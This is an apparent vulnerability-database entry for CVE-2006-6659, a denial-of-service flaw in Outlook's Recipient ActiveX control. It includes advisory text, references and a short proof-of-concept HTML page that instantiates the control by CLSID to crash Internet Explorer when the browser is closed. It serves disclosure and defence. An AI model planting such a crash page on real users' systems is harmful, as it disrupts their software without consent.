Microsoft Outlook ActiveX Control Remote Internet Explorer Denial-of-Service Vulnerability

Vulnerability ID: 1111786
Vulnerability type: Other
Published: 2006-12-18
Updated: 2006-12-21
CVE ID: CVE-2006-6659
CNNVD-ID: CNNVD-200612-420
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/29295
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-420
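|Vulnerability details
Microsoft Outlook is the e-mail client bundled with the Office suite from Microsoft (USA). It manages e-mail, contacts, calendars and similar data. The Recipient control (ole32.dll) in Microsoft Outlook has a denial-of-service vulnerability. If a user is tricked into opening a malicious HTML e-mail, Internet Explorer or other applications that use this ActiveX control will crash.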
|Exploit (EXP)
source: http://www.securityfocus.com/bid/21649/info

The Microsoft Office Outlook Recipient Control is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to trigger denial-of-service conditions in Internet Explorer or other applications that use the ActiveX control.

Specific information regarding affected packages is currently unavailable. This BID will be updated as more information becomes available.

<!--
------------------------------------------------------------------------
Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service
author: shinnai
site: http://shinnai.altervista.org
mail: shinnai[at]autistici[dot]org
and, always, special thanks to rgod

Tested on Windows XP Professional SP2 all patched

works with Internet Explorer 6 & 7
------------------------------------------------------------------------
-->

<html>
 <head>
 <title></title>
 </head>
 <object classid="clsid:0006F023-0000-0000-C000-000000000046" id="oLook" width="180" height="14"></object>
</html>

<!--
Just enable the control by clicking on it, then try to close IE.
-->
|References

Source: BID
Name: 21649
Link: http://www.securityfocus.com/bid/21649
Source: MISC
Link: http://shinnai.altervista.org/viewtopic.php?id=41&t_id=8
Source: SECTRACK
Name: 1017397
Link: http://securitytracker.com/id?1017397